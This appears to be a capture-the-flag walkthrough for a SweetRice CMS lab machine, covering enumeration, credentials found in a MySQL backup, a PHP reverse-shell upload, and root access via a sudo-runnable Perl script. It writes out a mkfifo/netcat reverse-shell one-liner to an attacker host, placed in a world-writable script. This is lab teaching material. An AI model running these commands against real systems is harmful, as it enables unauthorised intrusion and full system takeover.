1606070;"># Step 1: Enumeration
2nmap -sV TARGET_IP
3606070;"># 22 SSH, 80 HTTP
4
5gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
6606070;"># Found: /content
7
8606070;"># Further enumeration
9gobuster dir -u http:606070;">//TARGET_IP/content -w /usr/share/wordlists/dirb/common.txt
10606070;"># Found: /content/as (admin login), /content/inc
11
12606070;"># Step 2: Find Credentials
13606070;"># Check /content/inc/mysql_backup
14606070;"># Download and examine backup file
15606070;"># Contains: manager:Password123 (or similar)
16
17606070;"># Step 3: SweetRice Exploitation
18606070;"># Login at /content/as
19606070;"># Version has known vulnerabilities
20
21606070;"># Method 1: File upload via Ads section
22606070;"># Upload PHP reverse shell as "ad"
23
24606070;"># Method 2: Direct code execution vulnerability
25searchsploit sweetrice
26606070;"># Multiple exploits available
27
28606070;"># Step 4: Get Shell
29nc -lvnp 4444
30606070;"># Trigger uploaded shell
31
32cat /home/user/user.txt
33
34606070;"># Step 5: Privilege Escalation
35sudo -l
36606070;"># Can run /home/itguy/backup.pl as root
37
38cat /home/itguy/backup.pl
39606070;"># Calls /etc/copy.sh
40
41cat /etc/copy.sh
42606070;"># World writable!
43
44echo 606070;">#a5d6ff;">'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 5555 >/tmp/f' > /etc/copy.sh
45
46nc -lvnp 5555
47sudo /usr/bin/perl /home/itguy/backup.pl
48606070;"># Root shell!
49
50cat /root/root.txt